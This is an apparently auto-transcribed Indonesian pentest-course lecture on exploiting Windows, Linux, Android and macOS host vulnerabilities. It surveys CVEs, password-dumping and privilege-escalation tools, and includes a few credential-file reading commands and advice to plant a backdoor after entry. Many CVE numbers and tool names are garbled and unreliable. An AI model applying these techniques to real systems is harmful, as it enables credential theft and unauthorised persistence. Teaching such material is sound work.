Ya, kendalanya itu Ya, speknya minimal Intel i7, kemudian sebentar. Memori minimal 16. Terus kalau bisa SSD, Pak. Jadi udah nggak zaman pakai hard disk biasa. Kita pakai SSD. Saya kemarin sempat upgrade SSD 2 tera, terus yang C-nya saya pakai yang 512. Jadi hard disk saya di laptop ini udah SSD semua, full SSD. Kalau enggak lagging, Pak. Pasti ngehang lah, inilah itulah gitu. Jadi kadang-kadang ya itu problemnya. ya, Jadi Pak. memang untuk Jadi pengajaran materi, kemana-mana Pak masalahnya, Pak. ya Pak. Jadi kalau untuk Ya pengajaran, karena kemarin running 3 itu jadi kemana-mana masalahnya. oh iya, nggak apa-apa lah Pak. Ini Iya, kan Pak. ya ini Makasih, Pak. ya, biar tahu juga Pak kendalanya. Jadi gini emang kalau untuk Ya, apa pembelajaran seperti ini, ya spek kita harus mumpuni Pak. Speknya laptop kita karena apalagi kalau saya kayak saya kan ngajar ke luar negeri Pak. Ngajar di mana-mana di Korea, di Saudi. Nah, kalau spek saya nggak mumpuni, wah susah Pak. Saya kan nggak mungkin ngandalin mereka punya apa. Memang sih udah disediakan komputer, laptop dan sebagainya masih ada lah. Cuma kan kita ya namanya kerjaan ya Pak ya, urusan kerjaan ya kita maksudnya kita dahulukan lah gitu. Jadi saran saya sih nantinya kalau memang ada dana ya di-upgrade ke versi yang lebih mantap Pak. Karena ini kalau saya sih buat cari duit ini Pak. Laptopnya buat ngajar, buat ini buat apa kerjaan kan. Jadi ya speknya tinggi. Dari dulu sih saya punya kalau spek saya nggak pernah rendah-rendah. Saya ada satu laptop saya cuma karena gede berat itu yang 17 inch apa sebentar ya bukan 17 ya. 17 atau 15 ya lupa saya. Kalau 15 inci kan kecil ya. 17 inci saya punya ada laptopnya yang untuk MSI gaming punya. Biasa saya bawa kemana-mana itu ke luar negeri sampai ke Korea. Saya belinya di Korea. MSI gaming punya Pak. Itu speknya saya punya laptop itu 32 giga Pak. SSD-nya ada 3 biji. Jadi hard disk-nya ada 3. Itu spek laptop yang paling salah satu yang paling saya bisa andalkan. Jadi kalau mau jalanin yang apa training apa aja tuh mantap Pak. Nah sekarang saya malas mau bawa yang berat-berat ya saya pakai Asus VivoBook S14 yang 14 inci tapi speknya saya upgrade ke versi paling baru begitu. Oke Pak. Yang lain ya saya lanjut ya. Ada pertanyaan? Ya, jadi memang itulah kendalanya ya di situ sih sebenarnya. Ya. Sebentar saya inikan dulu saya siapin VM juga biar ini. Tapi ya nanti sambil kita jalanin ini deh ya. Oke, jadi hari ini ya Assalamualaikum warahmatullahi wabarakatuh. Selamat pagi semua. Waalaikumsalam warahmatullahi wabarakatuh. Ya Pak, mudah-mudahan masih sehat semua ya. Ngomong-ngomong yang saya lupa mau nanya nih, yang ikut ini apa nanti ikut yang materi yang lain? Kan nanti bulan Oktober kan kita ada materi lain tuh, Caisa. Nggak ikut ya Pak ya? Beda ya? Beda orang ya? Kurang tahu Pak, ini juga introduction-nya nggak ada, langsung kita Tiba-tiba diundang ya? nyemplungin ke sini Pak, Nah, course-nya. nggak apa-apa lah. Iya. Ya, Pak. terima aja Kita Pak. nggak Ini kan tahu gratisan rencananya Pak. seperti apa. Dibayarin kan? Oke lah. Alhamdulillah ya Pak. Kalau saya juga Ya, dikasih yang makasih Pak. gratisan, biar nggak dikasih tahu juga ayo-ayo aja. Oke, terima aja Pak. Bersyukur. Alhamdulillah. Ya Oke, Pak. saya sambung ya. Amin. Ya, jadi hari ini kita udah hari ke-7 ya. Bahas ini apa chapter 7 juga. Kalau Anda lihat di chapter 7 ini tentang ini ya. Tentang exploiting host-based vulnerabilities ya. Jadi kalau untuk exploiting host-based vulnerabilities-nya kita ada Windows-based vulnerabilities sama Unix-based, StarNix-based vulnerability. Jadi yang berbasis Unix ya. Kita bahas ini nih. Ya ini beberapa
general vulnerabilities atau commonalities among Windows-based vulnerabilities ya. Cukup common ini, di Windows. Misalnya operating system, most application based on C with no default bound checking ya. Di OS and most application yang ada di Windows itu kebanyakan ditulis dalam bahasa C. Nah, problemnya adalah nggak ada bound checking. Jadi misalnya untuk parameter input, susceptible to buffer overflow, arbitrary code execution, and privilege escalation. Ya, kemudian ada developers need to use security best practices in unit testing. Sekarang sih udah lebih bagus sih ya. Waktu Windows 2003, yang sebelum-sebelumnya, sebelum Windows 10, itu masih banyak kerentanan, tapi sekarang udah mulai bagus karena Microsoft menerapkan yang namanya SDL, Security Development Life Cycle. Nah, yang ini tadi yang developers need to use security best practices, ya. Kemudian, saya lihat ini kenapa nih internet not stable ya. Saya punya ini, sebentar saya cek dulu ya Pak. Ini tadi ada putus juga nih. Katanya nggak stabil. Ya, kemudian proprietary product. So source code is not publicly available. Ini problemnya di Windows kan proprietary product. Jadi produk yang memang tertutup, dia closed source, bukan open source. Fewer review open the door for undiscovered weaknesses. Ya, complexity enables vulnerabilities to remain undetected after release. Jadi complexity-nya yang jadi bikin kerentanan tuh banyak. Jadi kalau dilihat Windows sama Linux, kalau saya bilang dari mulai zaman saya belajar Windows sampai sekarang, itu jauh perkembangannya. Dulu mungkin kalau ditanya sistem operasi yang paling rentan, ya kita bisa bilang Windows. Tapi sekarang kebalikan, malah Linux yang banyak. Karena kan ada services dan aplikasi yang jalan yang bukan Linux-nya sendiri, kernelnya sih oke ya. Nah, justru sekarang Windows makin baik ya. Microsoft doesn't patch all vulnerabilities, they release new versions ya. This leaves the vulnerability unaddressed in older installation. Ini berlaku yang zaman dulu punya Windows, ya. Sekarang udah lebih baik, jauh baiknya. Dia mungkin lebih dari 80-90% perbaikannya. Ya. Kemudian servers, network-based vulnerabilities, workstations, application-based vulnerabilities. Jadi vulnerabilities yang ada di Windows ini banyak sekali. Use standard protocol technology susceptible to cross-platform exploit. Ya. Kemudian physical access puts hosts at greater risk. Connecting cables to administrative console port, booting to a different operating system, using removable media, stealing and damaging hardware, sama social engineering, ya, which is actually required to expose certain vulnerabilities. Ya. Jadi Windows sekarang udah, kalau dilihat dari sejarahnya, mungkin dari awal-awal orang bilang Windows itu, ini pengalaman saya sendiri ya, Windows itu banyak kerentanan, tapi sekarang udah jauh perbedaannya udah beda lah. Udah bisa dikatakan kerentanan tuh mungkin begitu rilis itu ya bisa kurang dari 10. Dulu awal-awal bisa sampai puluhan, Pak. Nah, ini adalah contoh sistem vulnerabilities yang ada di Windows, mulai dari remote code execution, buffer atau heap overflow. Ini karena sebenarnya programming language-nya yang jadi masalah, C dan C++ ya, denial of service, memory corruption, privilege escalation, information disclosure, security features bypass, cross-site scripting, directory traversal, cross-site request forgery. Nah, ini semua vulnerabilities yang ada di Windows ya. Nah, kemudian frequently exploited Windows features ya. Pertama itu di tahun 99 itu ada yang namanya null session, which allows anonymous connection to the IPC share. Exploitnya macam-macam, ada Enum for Windows, WinScan, SMB Enum, dan beberapa yang lain. Kemudian ini dimasukkan dalam CVE 199-0519. CVE ini adalah common vulnerability exposure, ini database vulnerabilities. Ya. Kemudian ada lagi yang di exploit seperti LM password hash, ya. Ini weak hashing mulai dari Windows versi lama ya. Masih juga dipertahankan di Windows 2016 dan Windows 10. Ya. Kemudian ada covert password to uppercase and divides into hash into ini password yang lama ini kan versi ini ya LM ya. Karena LM ini dia mengconvert hash itu menjadi 2 bagian 7 byte part ya, 7 byte setiap bagiannya.
Karena ini kan password ini di uppercase kan, jadi huruf besarkan, di-convert menjadi huruf besar, jadi crackingnya lebih gampang. Kemudian juga ada feature yang sering dieksploitasi, exploit IIS version 5 Unicode. Ini bisa mengakibatkan directory traversal yang biasanya bisa dieksploitasi untuk melakukan browsing ke directory-directory lain. Contohnya ada Nimdaworm itu. Ya. Dan password hashnya banyak ya dieksploitasi dengan menggunakan tools seperti Cain&Abel, Hydra, John the Ripper, Hashcat, ya, NetBIOS auditing, ya, kemudian beberapa yang lain. Ya. Kemudian ada juga yang IIS version 5 WebDAV. Ini masuk di CVE 2003 0109. Buffer overflow against the NTDLL, the DLL search WebDAV method. Ya, kemudian ada RPC CSS control DCOM. Ya, ini juga saya udah pernah sempat ya mungkin saya udah sempat inilah ya. RPC DCOM ini yang MS 03026 atau CVE 2003 0352 ya. Modulnya macam-macam ya. Kalau yang itu kan ada MS 03007, kemudian ada MS 03026 ya. Ini ya RPC dikembangkan di Windows versi 8.1 itu masih ada. Ya. Nah, kemudian ada SMB Net API, Microsoft Server Service Relative Path Stack Collection. Ya. Ini CVE 2008 42050. Exploitnya namanya MS08067 Net API. Ya. Exploitnya ada di exploitdb.com. Ya. Mungkin saya udah pernah ini ya diskusi ini ya masalah exploitdb, di mana Anda bisa download exploit yang ada di luar. Ya. Oke, di luar itu kita ada, sebentar, saya cek dulu ya. Oke, di luar itu ada SMB Net ini ya password cracking ya. Ini kita udah sempat bahas Windows password ya. Kita password cracking dengan menggunakan Hydra misalnya. Karena Windows itu kan nyimpen password di SAM file yaitu dalam bentuk LM atau NTLM hash ya. Kita bisa pakai Syski utility ya. Yang mengencrypt password tapi ya tetap bisa di bypass ya. Nah, kemudian bisa melakukan brute forcing dengan menggunakan banyak tool ya. Ada yang namanya apa kemarin tuh saya ada sempat baca. Banyak sebenarnya tool yang bisa digunakan untuk melakukan password cracking di Windows ya. Ya, problemnya itu tadi karena penyimpanan credential yang ada di memori, LSA secret, hashes, token ya. Ya. Masih banyak sekali tool yang bisa digunakan ya. Hydra, Medusa, Encrack, kemudian ada CryptCat, ya, Hashcat, kemudian ada namanya ada satu lagi tuh yang saya agak lupa namanya. Ya anyway, ini banyak sekali yang bisa di crack ya. Dan alternative to cracking, use privilege from buffer overflow to create new account, use dump hash to create new account, or Kerberos ticket, key logging, social engineering, atau boot into another OS. Ya, ini bisa banyak sekali ya. Kemudian toolsnya banyak sekali yang saya udah sempat sebut ya. Network brute forcing ada Hydra, Medusa, Encrack, ya, Brutus, Looptrack, ya, Metasploit, auxiliary scanner, dumping bisa pakai. Oh ya, ini toolnya namanya Mimikatz ya. Cain&Abel itu untuk dumping LSA secret, ya. PWDump, ya. CrackDump, Metasploit, gather LSA secret, ya. Kemudian untuk online cracking bisa pakai Metaplatter Hashdump, Metasploit module, Hashdump, Credential Collector, ya, FQDump, SumDump, ya. Kemudian untuk impersonating token bisa pakai steal token command, ya, atau incognito. Kemudian dumping Windows default password, ya, dengan menggunakan Nearsoft full password view atau built-in Windows credential, ya. Untuk Kerberos yang berhubungan dengan Kerberos itu bisa pakai Mimikatz, Powersploit, John the Ripper, dan beberapa yang lain. Kemudian untuk recovering Syski bootkey pakai BK Hype, BK Reg, ya, dumping cache, domain logon information, Cain&Abel,
credential dump, ya, dan beberapa yang lain. Ya. Kemudian ada offline SAM cracking, ya, can enable offline Active Directory cracking, ya. Dumping GPP file, ya, ini toolnya banyak sekali, ya. Ada Metasploit, ada PowerSploit, ya. Saya nggak bisa tunjukin semua ini, ya. Key logging bisa pakai Metapletter key scan, social engineering bisa pakai Kali social engineering toolkit, dumping unattended installation file, password, kemudian hard drive overwriting, ya. Banyak sekali toolnya. Ini contoh sederhana dari password cracking tool dengan menggunakan tool can enable, ya. Oke. Nah, kemudian juga di luar itu ada Windows Service and Protocol Configuration. All network services listen on at least one port. This makes them a target for remote attacks. Yeah. Protocols used by all Windows versions are likely to have version-specific exploit. For example, there are SMB exploit for every version of Windows since NT4. Do not overlook ports that are unfamiliar to you. Ya, they may have known exploit. Ya, ini contohnya ya banyak sekali exploit yang bisa dijalankan. IPv6 can carry exploit to the same TCP and UDP port as well as IPv4. Ya. Kemudian some services open secondary ports, ya. Even if current exploit do not target the secondary port by default, the process could still have vulnerabilities, ya. Ya, bisa kita jalanin banner grabbing pakai SV untuk melihat services yang ada. Kemudian many services can be downgraded to less secure protocol or configuration. Services tend to be the least secure out of the box, ya. Ya, jadi makanya harus di patching, harus di change default password, configuration, dan beberapa yang lain. Okay? Nah, kemudian many administrator use the same user account and password for different services across the domain. Many services use accounts with higher privilege level than necessary, especially the older platform. Many administrator configure services too loosely. Ya, contohnya karena dia nggak terlalu paham dengan security level dari masing-masing services. Most exploit allows you to change the target port, ya, adjusting your attack to account for security by obscurity, ya. Jadi Anda bisa coba eksperimen, ya. Jadi kalau kita ngelihat Windows ini memang eksploitasinya sangat-sangat luas, ya. Services with lower privilege level can be used as a stepping stone to escalate privilege, ya. Nah, termasuk juga Windows file system ini juga bisa dieksploitasi seperti permission-nya, ya. Ini karena default read permission, ADS, alternate data stream yang bisa memungkinkan kita menyimpan file, ya, hidden, yang menyembunyikan. Kemudian unquoted service path, ya, seperti melakukan DLL hijacking dan beberapa yang lain. Ya. Nah, kemudian Windows file system ini ada weak or non-existing encryption seperti NTFS encryption, syskey to encrypt the SAM, EFS, BitLocker, kemudian code vulnerabilities yang berhubungan dengan denial of service, master file table, Windows 10 NTFS owner mandatory label privilege bypass, atau juga NTFS denial of service exploit. Ya. Ya, kemudian untuk kernel juga banyak. Ada ini core part of Windows operating system yang dimana ini dia manage memory, schedule, processing. Nah, run at ring 0 and has priority over all other processes. Exploit that attack the kernel, escalate privilege, and destabilize the entire system. Nah, contohnya sederhana, Eternal Blue. Ini CVE 2017, ya, termasuk masih baru, ya. MS 2017 dan ini ya CVE 2017. Dikenal nama Eternal Blue SMB Remote Windows Kernel Pool Corruption Buffer Overflow, ya. Ini karena masalah SMB, ya. Ini juga eksploitasi di SMB. Kemudian ada kernel mode driver CVE 2016 MS 7255 sama MS 16135 Windows kernel mode driver, ya. Kemudian ada lagi yang lain seperti secondary logon service CVE 2016 0099 dan MS 16032 secondary logon handle local privilege escalation, ya. Kemudian ada kernel mode driver CVE 2015 1701 MS 15051 Windows kernel mode drivers.
allow local privilege escalation and arbitrary code, ya. Kemudian ada yang namanya Windows pointer, ya. Jadi Windows yang versi 2016 juga kena ini, ya. Windows Server, Windows null pointer di reference, ya, nih CVE 2014-4113 Windows Track pop-up menu, ya. Kemudian ada lagi kernel vulnerability CVE 2013 MS0414 Windows kernel vulnerability, kernel mode driver CVE 2013, MS13005 kernel mode driver, kemudian ada kernel vulnerability MS2010 CVE 2010 MS10 kernel vulnerability. Jadi banyak sekali Windows kernel vulnerabilities, ya. Termasuk juga privilege escalation, ya. Privilege escalation adalah satu proses di mana kalau si attacker itu masuk dia sebagai user biasa, dia harus naikin privilege level ke misalnya sebagai admin atau anti authority, ya. Privilege escalation, often the primary objective, can take several attempts to gain the level you need. Exploits against kernel, services, drivers, and application in privilege mode, ya. Vulnerability technique macam-macam, ada pakai SAM file, ya, dumping the contents of the SAM file, user application compromise bypassing UAC, user access control, dan beberapa yang lain, ya. Ya, kemudian juga bisa kita lihat ada local UAC bypass, ya, user access control bypass, ya, pakai ya misalnya di Windows 10 atau di Windows 7. Weak process permission, shared folders, DLL hijacking, writable services, sama kemudian WebDAV. Jadi ini sebenarnya privilege escalation ini sangat penting karena apa? Karena begitu kita masuk sebagai user biasa, kita harus punya akses yang lebih, kan. Jadi biasanya kita naikin privilege levelnya ke menjadi admin atau lebih tinggi lagi anti authority, ya. Nah, kemudian privilege escalation yang lain seperti ancillary function driver, task scheduler, ini ada di Windows 2008 misalnya, Windows 7, ya. Kemudian missing patches and misconfiguration juga bisa menjadi sumber bahwa Windows itu bisa kita eskalasi, ya. Ya, kemudian ada vulnerabilities yang lain seperti memory vulnerabilities, ya. Program flows that result in a proper access or handling or objects stored in memory. Memory corruption can lead to arbitrary code execution or denial of service, often not logged by the OS operating system, ya. Result in system destabilization, common Windows memory exploit, use after free, buffer overflow, heap overflow, integer overflow, memory leak, dan sebagainya. Jadi itu adalah beberapa bentuk kerentanan yang ada di Windows memory, ya. Ini sambil saya ngopi file, ya. Jadi saya ingin kasih demo dengan, ya, sebentar, ya. Saya cari ini dulu, ya, untuk Windows Server misalnya. Kayaknya saya punya ini nggak ada nyimpen file ini, ya.
Ya, ini sambil saya ngopi ya, saya jelasin juga. Karena saya ingin kasih demo yang dengan menggunakan sistem operasi yang cukup baru ya. Kemudian juga masalah-masalah yang ada di Windows itu termasuk default account seperti adanya GAS, administrator ya, KRB, TGT ya. Ini adalah default account yang mungkin bisa gunakan untuk eskalasi. Jadi exploit-nya misalnya contoh gas-nya use to run privilege escalation exploit ya. Contohnya add to any user group including administrator, use it to run privilege escalation exploit seperti di Windows exploit 3 master ya, CVE 2017. Bisa kalau administrator bisa menggunakan get system command ya. Kemudian ada dump account password hash and used to create unauthorized golden ticket access to Active Directory misalnya. Nah, kemudian account yang lain seperti default account Windows 10 ya, default account ini bisa di add ya, bisa dieksploitasi ya. Default account, WDAG utility account, default user 0 account ya. Nah, ini adalah account-account yang bisa dimanipulasi. Nah, kemudian penggunaan account manipulation ini bisa pakai list user, pakai net user, see information about the gas, ya. Search the status like net user gas, find something. Jadi, search user, ya. Jadi, ini adalah fungsi-fungsi atau komen-komen yang digunakan di Windows, ya. Jadi, kalau mau melakukan hacking pada Windows itu juga kitanya harus paham dengan tool-tool yang ada di Windows. Ya. Nah, maksudnya komen-komennya juga. Ya. Nah, ini coba saya inikan dulu ya. Saya sambil ada beberapa hard disk yang saya mau copy datanya. Sambil saya terangin ya. Ini kayaknya ada di sini, sebentar saya lihat. Oke, kemudian ini adalah contoh default configuration yang bisa dieksploitasi seperti kalau Anda lihat gambarnya di sini adalah contoh dari path atau directory traversal. Ya. Default configuration are predictable, easy to study for vulnerabilities. Early Windows version ship with easily exploited default configuration. Contohnya simple password that never expires, unnecessary services installed by default. Ya. Today's Windows version are more restrictive, but still need patching and security policies applied. Ya. Common vulnerable defaults seperti unnecessary services, support for SMB1, default account password, caching, default account, default security logging, dan sebagainya. Nah, ini juga salah satu yang paling sering ketemu, yaitu yang pakai VM, ya, namanya Sandbox Escapes. Sandbox sendiri adalah environment yang digunakan untuk mengisolasi komputer proses, ya, away from other processes as well as the host. Ya, kayak model kita punya VM lah. Sandbox Escape adalah exploit in which the guest break free of the sandbox. Ya, ini ada di CVE 2017-4901 namanya VMware Escape Exploit before VMware Workstation 12.5.5. Ya. Nah, kemudian efficient tekniknya macam-macam. Ya, ini bisa type sandbox macam-macam, bisa pakai VM, Docker, web browsers, ya, mobile application, PDF, documents, antivirus, quarantine, dan sebagainya. Nah, sandbox evasion teknik macam-macam. Ada pakai extended sleep, polymorphic malware, rootkits, bootkits, sandbox detection, encrypted archives, botnet commands and control, logic bombs, binary packers, network fast flux. Ya. Kemudian vulnerability macam-macam. Ada CP 2016, 3321, Internet Explorer iframe, sandbox. Kemudian ada CP 2015, Microsoft Remote Desktop Services. Ya.
i.e. sandbox escape-nya. Ini adalah contoh-contoh vulnerabilities yang ada yang berhubungan dengan sandboxing. Ya. Sebenarnya kalau di sandboxing kan yang namanya host dengan guest ya. Guest itu adalah ada VM-nya kita, sedangkan host kan adalah host machine-nya kita. Nah sebenarnya kalau nggak ada sandbox escape ini, aman-aman aja. Di tahun 2017 ditemukanlah bahwa ada kerentanan di mana kalau kita eksploitasi guest OS-nya itu bisa keluar sampai ke mengakses host ya. Kan bahaya tuh. Nah, kalau kita lihat dari summary-nya, guidelines for exploiting Windows-based vulnerabilities, ya kita bisa melakukan port scan, vulnerability scan, OS fingerprinting, ya untuk menemukan kerentanan yang ada. Kemudian kita bisa melakukan password cracking, termasuk juga privilege escalation, ya. Kemudian banyak kerentanan-kerentanan yang bisa kita eksploitasi dengan menggunakan atau memanfaatkan services yang ada, ya. Many services can be downgraded to less secure protocol version. Ya, kemudian ada masalah-masalah yang berhubungan dengan kernel, ya, drivers, services dan beberapa yang lain. Ya, kita juga bisa escalate system level privilege or for maximum exploit effectiveness. Ya, keep in mind that buffer overflow, while considering to be the gold standard of exploit, will by nature destabilize the target surface. Ya. Jadi bagusnya ya kita kalau udah masuk ya kita bikin backdoor ya supaya kita bisa masuk kapan aja kan gitu. Take advantage of the default account and SID ya. SID adalah security identifier that cannot be changed ya. Kemudian kita bisa targetkan Kerberos TGT to get a golden ticket. Ya ini ada golden ticket untuk akses, especially kalau kita kerjanya di domain ya. And then remember that Windows still ship with vulnerable default. Most of these code weaknesses that are allowed for backward compatibility. Yeah, ini. Yeah. As more server applications are moved into virtual environments, stay informed on upcoming sandbox escape that you can use. Yeah. Nah, ini nanti saya ada beberapa contoh ya untuk eksploitasinya. Ya. Tapi untuk saat sekarang saya jalankan dulu ya. Nah, kemudian di Linux atau di Unix-based vulnerabilities ini macam-macam ya. Sama, masih problemnya adalah pakai C ya, pakai bahasa C. Multiple developers cause inconsistency in implementing secure coding practices ya. Nah, susceptible to cross-platform exploit ya juga. Ini juga termasuk Android juga ya. Allow side loading application. Maksudnya side loading ini adalah downloading aplikasi dari tempat lain ya. Kalau Apple iOS very strict approval ya, installation process. Jadi agak susah di Apple iOS. Nah, ini adalah beberapa contoh Linux operating system vulnerabilities seperti Linux distribution, a version of the open source Linux operating system, the kernel that is packaged with other components such as installation programs, management tools, and other software. Similar categories vulnerabilities as in Windows, seperti denial of service, information disclosure, buffer or heap overflow, privilege escalation, remote code execution, memory corruption, security features bypass, kemudian ada directory troubles. Jadi kurang lebih sih ya. Ini contoh-contoh frequently exploited Linux features like rat to libc ya. Kemudian ada insecure sudo, ada sticky bit ya. Ini exploitnya macam-macam nih. Anda bisa lihat di bagian sebelah kanan itu kolom sebelah kanan itu exploit yang kita bisa ambil dari exploit DB ya. SUI executables ya, kemudian ada dirty cow bug ya di CVE 2016. A race condition in MMGAP-C leverage incorrect handling of copy on write or COW feature by kernel. Ya, exploitnya banyak nih, bisa dilihat. Kemudian ada 5-year bug, ya ini di CVE 2014. Kemudian ada remote root flow di CVE 2016. Ya, banyak sekali ya. Jadi kalau kita lihat ya antara Windows dan Linux ini sebenarnya kalau ditanya ya nggak ada yang secure ya. Karena banyak exploit-nya atau vulnerabilities-nya. Ya.
Nah, kemudian juga termasuk password cracking ada di Linux untuk di etc passwd ya. Ini kan disimpan nyimpan ininya username kan di passwd, hash value-nya di shadow ya. Nah, Anda bisa melakukan attacking dengan menggunakan beberapa tools seperti John the Ripper ya, brute forcing ya untuk SSH, Telnet, FTP, HTTP, Samba. Kemudian John the Ripper, Medusa, Hydra, Encrack, ya. Kemudian kita bisa copy /et passwd and /etc shadow, unshadow, kita combine. Kemudian kita crack dengan menggunakan John the Ripper, ya. Attack methodnya macam-macam, bisa pakai dump the hashes, pakai Metasploit, Module, John the Ripper, Rainbow Crack, Hashcat, dump clear text password, ya. Kemudian install physical software, base keylogger, use social engineering, ya, boot target into single mode driver untuk reset password. Ya, banyak sekali yang bisa kita lakukan di Linux sebenarnya. Ya. Kemudian untuk exploit seperti Linux Service and Protocol Configuration, kebanyakan yang berhubungan dengan ini contoh sederhana Ghost. Exploit how the popular Exim mail server uses get host by name function in new C library. Ya, ini ada Metasploit modulnya namanya Linux SMTP Exim get host by name atau Ghost. Shell Shock ini baru ini 2014 ya. Exploit how Bash Shell handles external environment variables. Exploit DB list 15 exploits. Heartbleed CVE 2014 10160 Poodle CVE 2014 3566 ya, banyak sekali ini berhubungan. Kalau Heartbleed sama Poodle berhubungan dengan SSL ya. Ya, kemudian untuk di Linux file system juga bisa dieksploitasi, seperti misalnya kita bisa melihat directory structure-nya ya, seperti top level directory seperti bin, boot dan sebagainya. Ya, kalau kita mau jadi pentester ya harus punya pengalaman dan maksudnya ya minimal kita punya pengalaman untuk melakukan eksploitasi terhadap Linux maupun Windows ya. Jadi harus ngerti Bash, harus ngerti scripting ya, dan beberapa yang lain. Ini contoh-contoh aja komen-komen yang ada di Windows ya. Kita mesti ngerti Linux file system ya. Kalau enggak kita nggak bisa eksploitasi kan susah ya. Kalau udah masuk terus diapain ya. Ini contoh aja Linux permission ya. Ini biasanya kita menggunakan beberapa command internal untuk melihat directory structure dari Linux ya dan file permission ya. Kemudian kita bisa change permission dengan menggunakan chmod ya. 777 644 ya. Ini tergantung dari kebutuhan kita mau jadiin apa nih, read write atau read write execute atau read only. Kemudian kita bisa juga set permission by using the set UID, ya, set GID, sticky bit, ya, dan beberapa sensitive Linux file seperti grub, passwd, shadow, group, gshadow, command line, ya, dan sebagainya. Ya, kemudian ada profile, host, resolve, ya, PAM, dan kemudian beberapa possible location to insert script that run when shell starts. Itu ada di .bash profile, .bash login, dan yang lain. Ya. Nah, privilege escalation juga memungkinkan mulai dari ya melakukan mendapatkan passwd dan shadow, kemudian kita cari root atau privilege passwordnya atau weak process permissionnya, atau menggunakan user application compromise dengan menggunakan beberapa plugin yang ada, misal OpenOffice, VNC, Adobe, Flash Player, termasuk juga set UID binary sama services running as root. Ini kita bisa jalankan atau memanfaatkan services yang running as root, ya, and see if we can actually compromise them. Ya. Kemudian ya teknik yang lain seperti shared folders, kernel service exploits, Meterpreter upgrade, ya, Netshell upgrade, ya, kemudian exploit cron job, missing patches. Ya, nanti saya tunjukkan beberapa yang bisa kita ini kan ya. Mungkin saya bisa demoin beberapa hal, ya. Termasuk default account yang mungkin kita bisa manfaatkan ya, mulai dari root, super user account, ADM for diagnostic and monitoring, ya, SSHD, unprivileged operation for SSH daemon, dan beberapa yang lain ya, FTP, LP, ya.
Nah, contoh-contoh sederhana bagaimana kita bisa memanfaatkan atau mengambil default account di Linux ya, seperti cat/etc passwd sudo, cat/etc shadow ya, kemudian get uid ya, get ent passwd 0 ya, dan sebagainya. Ya. Kemudian default configuration in Linux seperti user home permission ya, default permission 775, world readable and world writable directory itu permissionnya 644, insecure mount ya, services application with weak path default ya, seperti kita bisa cari nih ya, communication protocol that is not secure, that are not secure, default password atau port-port yang mana. Jadi beberapa default command atau tools yang ada di Linux juga bisa dieksploitasi sebenarnya ya. Termasuk Android, karena Android ini kan berbasis Linux ya, jadi kan based on Linux ya. Nah, ini juga tersendiri pembahasannya. Sebenarnya di Pentas Plus kita tidak terlalu bahas ini, tapi ya sedikit dikasih intro lah. Kerentanan yang ada seperti physical theft ya, weak or no password, lack of data encryption, ability to sideload application, rooted device, SQL injection, banyak sekali ya. Karena ini sebenarnya ya bedanya cuma kalau Android kan jalan di HP ya, atau di device ya. Kalau Linux kan kebanyakan di PC. Nah itu aja sih sebenarnya. Contoh-contoh vulnerability yang lain seperti unauthorized access or excessive permission by application, data leakage, lack of antivirus, missing updates and patches, quad router vulnerabilities. Ini CVE 2016, a set of vulnerabilities affecting devices that uses Qualcomm chipset ya. Kemudian ada beberapa yang lain seperti Certify Gate MRST Flow, ya, Stage Fright, Android Installer Hijacking, Fake ID, Toll Road, Janus Vulnerability, Cross-Platform Vulnerabilities, ya, yang gabungan seperti Poodle, Crack, Dirty Cow, ya, banyak sekali, ya. Nah, termasuk juga macOS, tapi macOS lebih bagus sih dari sisi reputasinya, bagus di sisi security ya, karena kan memang dia punya prosedur yang strict yang sangat ketat ya. Basisnya sebenarnya BSD Unix sih sebenarnya ya dari Apple. Jailbreaking a device introduce more vulnerability. Jadi kalau Apple iOS, Mac iOS kalau tidak di jailbreak itu sebenarnya susah buat tembus ya. Ya, beberapa vulnerabilities yang ada seperti kernel memory corruption, graphic driver vulnerabilities, ini ada di CVE 2018 4150, graphic driver vulnerabilities ya CVE 2018 4109, IO mobile frame buffer overflow, High Sierra bug ya. Allow anyone to log into Mac OS High Sierra as root with no password ya. Kemudian ada MacTans ya, plugging your iPhone into malicious USB charger will inject persistent malware into your device. Nah, ini beberapa yang ada. Jailbroken iPhone, Thunderstrike, iCloud API vulnerability, Mac control backdoor, ya banyak sekali ini. Ya. Termasuk juga ada hardware attack yang berhubungan dengan operating system seperti cold boot attack, an attack where the attacker with physical access to computer that contains an encrypted drive may be able to retrieve encryption key after starting computer from its off state. Kemudian ada serial console, yang biasa konsol pakai RS-232 atau USB. Ini juga bisa memberikan akses ke administratif ke komputer atau network device. Ya. Kemudian juga ada JTAG Joint Task Action Group Connector ya. Ini juga saya terus terang kalau untuk connector sama debugging saya belum pernah punya pengalaman ya. Ini adalah simple hardware interface that enables computer to communicate directly with chips on board. Kemudian ada JTAG debugging, yaitu troubleshooting methodology used by hardware manufacturer to test printed circuit boards and used to hack the device such as home router. Nah ini dua ini belum pernah saya ketemu ya. Kalau yang lain sih kalau seperti cold boot udah pernah, serial console juga udah pernah. Ya. Nah ini contoh ini ya kayaknya dari JTAG connector nih. Ya. Oke, jadi sebenarnya kalau dilihat dari Windows kita bandingkan dengan Linux itu nggak terlalu banyak berbeda karena kan sebenarnya basis operating system yang ada Windows, Linux maupun Mac OS itu adalah diprogram dengan menggunakan bahasa pemrograman C atau C programming language ya.
Jadi kerentanannya kurang lebih ya ada buffer overflow, ya ada denial of service. Nah, kemudian Anda bisa mencari exploit di online ya, misalnya untuk pakai Metasploit yang ada. Metasploit kan ini sebenarnya adalah framework ya. Metasploit adalah framework yang kita gunakan untuk menjalankan beberapa hal, termasuk mencari exploit yang bisa digunakan untuk Windows maupun Linux ya. Nah, kemudian when cracking password in Linux, consider using combination of technique ya. Kita bisa gabung etc passwd sama etc shadow, kemudian dumping hashes, brute forcing, kemudian using SMB exploit ya. Anda bisa gunakan Nmap atau online research to identify vulnerable services and protocols ya. Kemudian untuk Linux itu bisa kita lihat bisa menggunakan sticky bit, SUID, SGID to attack Linux system ya. Karena berhubungan dengan direktori-direktori yang sensitif tapi weak permission ya. Nah, termasuk cracking, exploit, kernel exploit, shared directories, you know. Kemudian juga ada beberapa modul-modul yang di Metasploit yang bisa digunakan untuk men-escalate privilege ya. Ya. Oke, termasuk. Jadi ini sebenarnya kurang lebih sih ya, mau dia Linux, mau dia Windows, ini sebenarnya kurang lebih ya. Jadi kerentanan tuh ya antara SMB, beberapa services yang memang mungkin sebelumnya tuh udah pernah ditemukan kerentanannya. Ya. Look for service and protocol version, weak directory permission, and weak mount point that you can target. Ya, oke. Nah, kemudian ini kayaknya ada activity. Ya, sebentar ya, saya coba cancel dulu. Ya, sebentar, kita coba. Sebentar, kita coba mungkin untuk demo awal saya bisa coba lihat ya. Sebentar ya, kita lihat beberapa yang bisa 